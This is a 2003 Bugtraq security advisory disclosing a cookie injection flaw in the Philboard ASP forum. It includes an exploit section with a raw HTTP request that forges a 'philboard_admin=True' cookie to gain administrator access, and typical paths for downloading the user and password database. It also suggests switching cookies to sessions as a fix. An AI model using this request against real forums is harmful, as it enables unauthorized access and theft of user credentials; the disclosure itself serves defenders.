[30292] in bugtraq
Philboard Forum Vulnerability
daemon@ATHENA.MIT.EDU (aresu@bosen.net)
Fri May 30 02:19:56 2003
Message-ID: <1054198125.3ed5c96d45e59@webmail.bosen.net>
Date: Thu, 29 May 2003 15:48:45 +0700
From: aresu@bosen.net
To: bugtraq@securityfocus.com
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
X-Errot-Report-To: Agus Supriadhie <bosen@antionline.org>
Philboard Vulnerability
Severity : High (Possible gain administrator/users access on Forum Board)
Systems Affected: Philboard up to v1.14
Vendor URL: http://www.youngpip.com/philboard.asp
Vuln Type : Cookie Injection
Status : Vendor contacted, fixed version is not available (cause they didn't
response)
Author : AresU
Greetz to : Bosen, Tioeuy, syzwz, Heltz, eF73, SakitJiwa, gembule, muthafuka,
and All 1ndonesian Security Team (1st)
#romance@centrin.net.id
http://www.bosen.net/releases/
Summary
=======
Philboard is freeware forum application under ASP Scripts.
Vulnerable script is on cookie management, all most script is vulnerable for
cookie injection. The cookies are "philboard_admin=True;" or "admin=True;"
Acknowledgments
===============
Vulnerability discovery and advisory by AresU
Vendor Response
===============
Vendor has contacted and fixed version is not available (cause they didn't
reponse)
To Fix the script, you must change every cookie command in to session command.
Exploit Code
============
1) Login Administrator Forum:
Use your telnet and open target on port 80
GET /board/philboard_admin.asp HTTP/1.0
Host: target.com
Cookie: philboard_admin=True;
2) Download the database (users and password):
Usually, the database location can be found and download it from:
http://www.target.com/database/philboard.mdb
or
http://www.target.com/forum/database/philboard.mdb
-----------------------------------------------
This mail sent through http://webmail.bosen.net
